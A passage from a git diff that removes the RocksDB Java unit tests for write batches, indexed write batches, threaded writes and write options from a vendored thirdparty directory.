-      events.add(new Tuple<>(Action.DELETE,
-          new Tuple<byte[], byte[]>(key, null)));
-    }
-
-    @Override
-    public void deleteRange(final byte[] beginKey, final byte[] endKey) {
-      events.add(new Tuple<>(Action.DELETE_RANGE, new Tuple<byte[], byte[]>(beginKey, endKey)));
-    }
-
-    @Override
-    public void logData(final byte[] blob) {
-      events.add(new Tuple<>(Action.LOG,
-          new Tuple<byte[], byte[]>(null, blob)));
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java
deleted file mode 100644
index 83f90c8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java
+++ /dev/null
@@ -1,296 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.UnsupportedEncodingException;
-import java.util.Arrays;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-/**
- * This class mimics the db/write_batch_test.cc
- * in the c++ rocksdb library.
- * <p/>
- * Not ported yet:
- * <p/>
- * Continue();
- * PutGatherSlices();
- */
-public class WriteBatchTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void emptyWriteBatch() {
-    try (final WriteBatch batch = new WriteBatch()) {
-      assertThat(batch.count()).isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void multipleBatchOperations()
-      throws UnsupportedEncodingException {
-    try (WriteBatch batch = new WriteBatch()) {
-      batch.put("foo".getBytes("US-ASCII"), "bar".getBytes("US-ASCII"));
-      batch.remove("box".getBytes("US-ASCII"));
-      batch.put("baz".getBytes("US-ASCII"), "boo".getBytes("US-ASCII"));
-
-      WriteBatchTestInternalHelper.setSequence(batch, 100);
-      assertThat(WriteBatchTestInternalHelper.sequence(batch)).
-          isNotNull().
-          isEqualTo(100);
-      assertThat(batch.count()).isEqualTo(3);
-      assertThat(new String(getContents(batch), "US-ASCII")).
-          isEqualTo("Put(baz, boo)@102" +
-              "Delete(box)@101" +
-              "Put(foo, bar)@100");
-    }
-  }
-
-  @Test
-  public void testAppendOperation()
-      throws UnsupportedEncodingException {
-    try (final WriteBatch b1 = new WriteBatch();
-         final WriteBatch b2 = new WriteBatch()) {
-      WriteBatchTestInternalHelper.setSequence(b1, 200);
-      WriteBatchTestInternalHelper.setSequence(b2, 300);
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(getContents(b1).length).isEqualTo(0);
-      assertThat(b1.count()).isEqualTo(0);
-      b2.put("a".getBytes("US-ASCII"), "va".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat("Put(a, va)@200".equals(new String(getContents(b1),
-          "US-ASCII")));
-      assertThat(b1.count()).isEqualTo(1);
-      b2.clear();
-      b2.put("b".getBytes("US-ASCII"), "vb".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(("Put(a, va)@200" +
-          "Put(b, vb)@201")
-          .equals(new String(getContents(b1), "US-ASCII")));
-      assertThat(b1.count()).isEqualTo(2);
-      b2.remove("foo".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(("Put(a, va)@200" +
-          "Put(b, vb)@202" +
-          "Put(b, vb)@201" +
-          "Delete(foo)@203")
-          .equals(new String(getContents(b1), "US-ASCII")));
-      assertThat(b1.count()).isEqualTo(4);
-    }
-  }
-
-  @Test
-  public void blobOperation()
-      throws UnsupportedEncodingException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.put("k1".getBytes("US-ASCII"), "v1".getBytes("US-ASCII"));
-      batch.put("k2".getBytes("US-ASCII"), "v2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3".getBytes("US-ASCII"));
-      batch.putLogData("blob1".getBytes("US-ASCII"));
-      batch.remove("k2".getBytes("US-ASCII"));
-      batch.putLogData("blob2".getBytes("US-ASCII"));
-      batch.merge("foo".getBytes("US-ASCII"), "bar".getBytes("US-ASCII"));
-      assertThat(batch.count()).isEqualTo(5);
-      assertThat(("Merge(foo, bar)@4" +
-          "Put(k1, v1)@0" +
-          "Delete(k2)@3" +
-          "Put(k2, v2)@1" +
-          "Put(k3, v3)@2")
-          .equals(new String(getContents(batch), "US-ASCII")));
-    }
-  }
-
-  @Test
-  public void savePoints()
-      throws UnsupportedEncodingException, RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.put("k1".getBytes("US-ASCII"), "v1".getBytes("US-ASCII"));
-      batch.put("k2".getBytes("US-ASCII"), "v2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k1")).isEqualTo("v1");
-      assertThat(getFromWriteBatch(batch, "k2")).isEqualTo("v2");
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3");
-
-
-      batch.setSavePoint();
-
-      batch.remove("k2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3-2".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k2")).isNull();
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-2");
-
-
-      batch.setSavePoint();
-
-      batch.put("k3".getBytes("US-ASCII"), "v3-3".getBytes("US-ASCII"));
-      batch.put("k4".getBytes("US-ASCII"), "v4".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-3");
-      assertThat(getFromWriteBatch(batch, "k4")).isEqualTo("v4");
-
-
-      batch.rollbackToSavePoint();
-
-      assertThat(getFromWriteBatch(batch, "k2")).isNull();
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-2");
-      assertThat(getFromWriteBatch(batch, "k4")).isNull();
-
-
-      batch.rollbackToSavePoint();
-
-      assertThat(getFromWriteBatch(batch, "k1")).isEqualTo("v1");
-      assertThat(getFromWriteBatch(batch, "k2")).isEqualTo("v2");
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3");
-      assertThat(getFromWriteBatch(batch, "k4")).isNull();
-    }
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-
-      WriteBatch batch = new WriteBatch();
-      batch.deleteRange("key2".getBytes(), "key4".getBytes());
-      db.write(new WriteOptions(), batch);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints() throws RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.rollbackToSavePoint();
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints_nested() throws RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-
-      batch.setSavePoint();
-      batch.rollbackToSavePoint();
-
-      // without previous corresponding setSavePoint
-      batch.rollbackToSavePoint();
-    }
-  }
-
-  static byte[] getContents(final WriteBatch wb) {
-    return getContents(wb.nativeHandle_);
-  }
-
-  static String getFromWriteBatch(final WriteBatch wb, final String key)
-      throws RocksDBException, UnsupportedEncodingException {
-    final WriteBatchGetter getter =
-        new WriteBatchGetter(key.getBytes("US-ASCII"));
-    wb.iterate(getter);
-    if(getter.getValue() != null) {
-      return new String(getter.getValue(), "US-ASCII");
-    } else {
-      return null;
-    }
-  }
-
-  private static native byte[] getContents(final long writeBatchHandle);
-
-  private static class WriteBatchGetter extends WriteBatch.Handler {
-
-    private final byte[] key;
-    private byte[] value;
-
-    public WriteBatchGetter(final byte[] key) {
-      this.key = key;
-    }
-
-    public byte[] getValue() {
-      return value;
-    }
-
-    @Override
-    public void put(final byte[] key, final byte[] value) {
-      if(Arrays.equals(this.key, key)) {
-        this.value = value;
-      }
-    }
-
-    @Override
-    public void merge(final byte[] key, final byte[] value) {
-      if(Arrays.equals(this.key, key)) {
-        throw new UnsupportedOperationException();
-      }
-    }
-
-    @Override
-    public void delete(final byte[] key) {
-      if(Arrays.equals(this.key, key)) {
-        this.value = null;
-      }
-    }
-
-    @Override
-    public void deleteRange(final byte[] beginKey, final byte[] endKey) {
-      throw new UnsupportedOperationException();
-    }
-
-    @Override
-    public void logData(final byte[] blob) {
-    }
-  }
-}
-
-/**
- * Package-private class which provides java api to access
- * c++ WriteBatchInternal.
- */
-class WriteBatchTestInternalHelper {
-  static void setSequence(final WriteBatch wb, final long sn) {
-    setSequence(wb.nativeHandle_, sn);
-  }
-
-  static long sequence(final WriteBatch wb) {
-    return sequence(wb.nativeHandle_);
-  }
-
-  static void append(final WriteBatch wb1, final WriteBatch wb2) {
-    append(wb1.nativeHandle_, wb2.nativeHandle_);
-  }
-
-  private static native void setSequence(final long writeBatchHandle,
-      final long sn);
-
-  private static native long sequence(final long writeBatchHandle);
-
-  private static native void append(final long writeBatchHandle1,
-      final long writeBatchHandle2);
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
deleted file mode 100644
index c5090db..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
+++ /dev/null
@@ -1,104 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.junit.runner.RunWith;
-import org.junit.runners.Parameterized;
-import org.junit.runners.Parameterized.Parameter;
-import org.junit.runners.Parameterized.Parameters;
-
-import java.nio.ByteBuffer;
-import java.util.*;
-import java.util.concurrent.*;
-
-@RunWith(Parameterized.class)
-public class WriteBatchThreadedTest {
-
-  @Parameters(name = "WriteBatchThreadedTest(threadCount={0})")
-  public static Iterable<Integer> data() {
-    return Arrays.asList(new Integer[]{1, 10, 50, 100});
-  }
-
-  @Parameter
-  public int threadCount;
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  RocksDB db;
-
-  @Before
-  public void setUp() throws Exception {
-    RocksDB.loadLibrary();
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setIncreaseParallelism(32);
-    db = RocksDB.open(options, dbFolder.getRoot().getAbsolutePath());
-    assert (db != null);
-  }
-
-  @After
-  public void tearDown() throws Exception {
-    if (db != null) {
-      db.close();
-    }
-  }
-
-  @Test
-  public void threadedWrites() throws InterruptedException, ExecutionException {
-    final List<Callable<Void>> callables = new ArrayList<>();
-    for (int i = 0; i < 100; i++) {
-      final int offset = i * 100;
-      callables.add(new Callable<Void>() {
-        @Override
-        public Void call() throws RocksDBException {
-          try (final WriteBatch wb = new WriteBatch();
-               final WriteOptions w_opt = new WriteOptions()) {
-            for (int i = offset; i < offset + 100; i++) {
-              wb.put(ByteBuffer.allocate(4).putInt(i).array(), "parallel rocks test".getBytes());
-            }
-            db.write(w_opt, wb);
-          }
-          return null;
-        }
-      });
-    }
-
-    //submit the callables
-    final ExecutorService executorService =
-        Executors.newFixedThreadPool(threadCount);
-    try {
-      final ExecutorCompletionService<Void> completionService =
-          new ExecutorCompletionService<>(executorService);
-      final Set<Future<Void>> futures = new HashSet<>();
-      for (final Callable<Void> callable : callables) {
-        futures.add(completionService.submit(callable));
-      }
-
-      while (futures.size() > 0) {
-        final Future<Void> future = completionService.take();
-        futures.remove(future);
-
-        try {
-          future.get();
-        } catch (final ExecutionException e) {
-          for (final Future<Void> f : futures) {
-            f.cancel(true);
-          }
-
-          throw e;
-        }
-      }
-    } finally {
-      executorService.shutdown();
-      executorService.awaitTermination(10, TimeUnit.SECONDS);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
deleted file mode 100644
index 1c5e342..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
+++ /dev/null
@@ -1,410 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.UnsupportedEncodingException;
-import java.nio.ByteBuffer;
-import java.util.Arrays;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WriteBatchWithIndexTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void readYourOwnWrites() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] k1 = "key1".getBytes();
-      final byte[] v1 = "value1".getBytes();
-      final byte[] k2 = "key2".getBytes();
-      final byte[] v2 = "value2".getBytes();
-
-      db.put(k1, v1);
-      db.put(k2, v2);
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final RocksIterator base = db.newIterator();
-           final RocksIterator it = wbwi.newIteratorWithBase(base)) {
-
-        it.seek(k1);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k1);
-        assertThat(it.value()).isEqualTo(v1);
-
-        it.seek(k2);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k2);
-        assertThat(it.value()).isEqualTo(v2);
-
-        //put data to the write batch and make sure we can read it.
-        final byte[] k3 = "key3".getBytes();
-        final byte[] v3 = "value3".getBytes();
-        wbwi.put(k3, v3);
-        it.seek(k3);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k3);
-        assertThat(it.value()).isEqualTo(v3);
-
-        //update k2 in the write batch and check the value
-        final byte[] v2Other = "otherValue2".getBytes();
-        wbwi.put(k2, v2Other);
-        it.seek(k2);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k2);
-        assertThat(it.value()).isEqualTo(v2Other);
-
-        //remove k1 and make sure we can read back the write
-        wbwi.remove(k1);
-        it.seek(k1);
-        assertThat(it.key()).isNotEqualTo(k1);
-
-        //reinsert k1 and make sure we see the new value
-        final byte[] v1Other = "otherValue1".getBytes();
-        wbwi.put(k1, v1Other);
-        it.seek(k1);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k1);
-        assertThat(it.value()).isEqualTo(v1Other);
-      }
-    }
-  }
-
-  @Test
-  public void write_writeBatchWithIndex() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] k1 = "key1".getBytes();
-      final byte[] v1 = "value1".getBytes();
-      final byte[] k2 = "key2".getBytes();
-      final byte[] v2 = "value2".getBytes();
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-        wbwi.put(k1, v1);
-        wbwi.put(k2, v2);
-
-        db.write(new WriteOptions(), wbwi);
-      }
-
-      assertThat(db.get(k1)).isEqualTo(v1);
-      assertThat(db.get(k2)).isEqualTo(v2);
-    }
-  }
-
-  @Test
-  public void iterator() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true)) {
-
-      final String k1 = "key1";
-      final String v1 = "value1";
-      final String k2 = "key2";
-      final String v2 = "value2";
-      final String k3 = "key3";
-      final String v3 = "value3";
-      final byte[] k1b = k1.getBytes();
-      final byte[] v1b = v1.getBytes();
-      final byte[] k2b = k2.getBytes();
-      final byte[] v2b = v2.getBytes();
-      final byte[] k3b = k3.getBytes();
-      final byte[] v3b = v3.getBytes();
-
-      //add put records
-      wbwi.put(k1b, v1b);
-      wbwi.put(k2b, v2b);
-      wbwi.put(k3b, v3b);
-
-      //add a deletion record
-      final String k4 = "key4";
-      final byte[] k4b = k4.getBytes();
-      wbwi.remove(k4b);
-
-      final WBWIRocksIterator.WriteEntry[] expected = {
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k1), new DirectSlice(v1)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k2), new DirectSlice(v2)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k3), new DirectSlice(v3)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.DELETE,
-              new DirectSlice(k4), DirectSlice.NONE)
-      };
-
-      try (final WBWIRocksIterator it = wbwi.newIterator()) {
-        //direct access - seek to key offsets
-        final int[] testOffsets = {2, 0, 1, 3};
-
-        for (int i = 0; i < testOffsets.length; i++) {
-          final int testOffset = testOffsets[i];
-          final byte[] key = toArray(expected[testOffset].getKey().data());
-
-          it.seek(key);
-          assertThat(it.isValid()).isTrue();
-
-          final WBWIRocksIterator.WriteEntry entry = it.entry();
-          assertThat(entry.equals(expected[testOffset])).isTrue();
-        }
-
-        //forward iterative access
-        int i = 0;
-        for (it.seekToFirst(); it.isValid(); it.next()) {
-          assertThat(it.entry().equals(expected[i++])).isTrue();
-        }
-
-        //reverse iterative access
-        i = expected.length - 1;
-        for (it.seekToLast(); it.isValid(); it.prev()) {
-          assertThat(it.entry().equals(expected[i--])).isTrue();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void zeroByteTests() {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true)) {
-      final byte[] zeroByteValue = new byte[]{0, 0};
-      //add zero byte value
-      wbwi.put(zeroByteValue, zeroByteValue);
-
-      final ByteBuffer buffer = ByteBuffer.allocateDirect(zeroByteValue.length);
-      buffer.put(zeroByteValue);
-
-      final WBWIRocksIterator.WriteEntry expected =
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(buffer, zeroByteValue.length),
-              new DirectSlice(buffer, zeroByteValue.length));
-
-      try (final WBWIRocksIterator it = wbwi.newIterator()) {
-        it.seekToFirst();
-        final WBWIRocksIterator.WriteEntry actual = it.entry();
-        assertThat(actual.equals(expected)).isTrue();
-        assertThat(it.entry().hashCode() == expected.hashCode()).isTrue();
-      }
-    }
-  }
-
-  @Test
-  public void savePoints()
-      throws UnsupportedEncodingException, RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final ReadOptions readOptions = new ReadOptions()) {
-        wbwi.put("k1".getBytes(), "v1".getBytes());
-        wbwi.put("k2".getBytes(), "v2".getBytes());
-        wbwi.put("k3".getBytes(), "v3".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k1"))
-            .isEqualTo("v1");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isEqualTo("v2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3");
-
-
-        wbwi.setSavePoint();
-
-        wbwi.remove("k2".getBytes());
-        wbwi.put("k3".getBytes(), "v3-2".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isNull();
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-2");
-
-
-        wbwi.setSavePoint();
-
-        wbwi.put("k3".getBytes(), "v3-3".getBytes());
-        wbwi.put("k4".getBytes(), "v4".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-3");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isEqualTo("v4");
-
-
-        wbwi.rollbackToSavePoint();
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isNull();
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isNull();
-
-
-        wbwi.rollbackToSavePoint();
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k1"))
-            .isEqualTo("v1");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isEqualTo("v2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isNull();
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-      wbwi.rollbackToSavePoint();
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints_nested() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-
-      wbwi.setSavePoint();
-      wbwi.rollbackToSavePoint();
-
-      // without previous corresponding setSavePoint
-      wbwi.rollbackToSavePoint();
-    }
-  }
-
-  private static String getFromWriteBatchWithIndex(final RocksDB db,
-      final ReadOptions readOptions, final WriteBatchWithIndex wbwi,
-      final String skey) {
-    final byte[] key = skey.getBytes();
-    try(final RocksIterator baseIterator = db.newIterator(readOptions);
-        final RocksIterator iterator = wbwi.newIteratorWithBase(baseIterator)) {
-      iterator.seek(key);
-
-      // Arrays.equals(key, iterator.key()) ensures an exact match in Rocks,
-      // instead of a nearest match
-      return iterator.isValid() &&
-          Arrays.equals(key, iterator.key()) ?
-          new String(iterator.value()) : null;
-    }
-  }
-
-  @Test
-  public void getFromBatch() throws RocksDBException {
-    final byte[] k1 = "k1".getBytes();
-    final byte[] k2 = "k2".getBytes();
-    final byte[] k3 = "k3".getBytes();
-    final byte[] k4 = "k4".getBytes();
-
-    final byte[] v1 = "v1".getBytes();
-    final byte[] v2 = "v2".getBytes();
-    final byte[] v3 = "v3".getBytes();
-
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-         final DBOptions dbOptions = new DBOptions()) {
-      wbwi.put(k1, v1);
-      wbwi.put(k2, v2);
-      wbwi.put(k3, v3);
-
-      assertThat(wbwi.getFromBatch(dbOptions, k1)).isEqualTo(v1);
-      assertThat(wbwi.getFromBatch(dbOptions, k2)).isEqualTo(v2);
-      assertThat(wbwi.getFromBatch(dbOptions, k3)).isEqualTo(v3);
-      assertThat(wbwi.getFromBatch(dbOptions, k4)).isNull();
-
-      wbwi.remove(k2);
-
-      assertThat(wbwi.getFromBatch(dbOptions, k2)).isNull();
-    }
-  }
-
-  @Test
-  public void getFromBatchAndDB() throws RocksDBException {
-    final byte[] k1 = "k1".getBytes();
-    final byte[] k2 = "k2".getBytes();
-    final byte[] k3 = "k3".getBytes();
-    final byte[] k4 = "k4".getBytes();
-
-    final byte[] v1 = "v1".getBytes();
-    final byte[] v2 = "v2".getBytes();
-    final byte[] v3 = "v3".getBytes();
-    final byte[] v4 = "v4".getBytes();
-
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put(k1, v1);
-      db.put(k2, v2);
-      db.put(k4, v4);
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final DBOptions dbOptions = new DBOptions();
-           final ReadOptions readOptions = new ReadOptions()) {
-
-        assertThat(wbwi.getFromBatch(dbOptions, k1)).isNull();
-        assertThat(wbwi.getFromBatch(dbOptions, k2)).isNull();
-        assertThat(wbwi.getFromBatch(dbOptions, k4)).isNull();
-
-        wbwi.put(k3, v3);
-
-        assertThat(wbwi.getFromBatch(dbOptions, k3)).isEqualTo(v3);
-
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k1)).isEqualTo(v1);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k2)).isEqualTo(v2);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k3)).isEqualTo(v3);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k4)).isEqualTo(v4);
-
-        wbwi.remove(k4);
-
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k4)).isNull();
-      }
-    }
-  }
-  private byte[] toArray(final ByteBuffer buf) {
-    final byte[] ary = new byte[buf.remaining()];
-    buf.get(ary);
-    return ary;
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-
-      WriteBatch batch = new WriteBatch();
-      batch.deleteRange("key2".getBytes(), "key4".getBytes());
-      db.write(new WriteOptions(), batch);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java
deleted file mode 100644
index 72a0687..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java
+++ /dev/null
@@ -1,45 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class WriteOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void writeOptions() {
-    try (final WriteOptions writeOptions = new WriteOptions()) {
-
-      writeOptions.setSync(true);
-      assertThat(writeOptions.sync()).isTrue();
-      writeOptions.setSync(false);
-      assertThat(writeOptions.sync()).isFalse();
-
-      writeOptions.setDisableWAL(true);
-      assertThat(writeOptions.disableWAL()).isTrue();
-      writeOptions.setDisableWAL(false);
-      assertThat(writeOptions.disableWAL()).isFalse();
-
-
-      writeOptions.setIgnoreMissingColumnFamilies(true);
-      assertThat(writeOptions.ignoreMissingColumnFamilies()).isTrue();
-      writeOptions.setIgnoreMissingColumnFamilies(false);
-      assertThat(writeOptions.ignoreMissingColumnFamilies()).isFalse();
-
-      writeOptions.setNoSlowdown(true);
-      assertThat(writeOptions.noSlowdown()).isTrue();
-      writeOptions.setNoSlowdown(false);
-      assertThat(writeOptions.noSlowdown()).isFalse();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
deleted file mode 100644
index 02ad038..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
+++ /dev/null
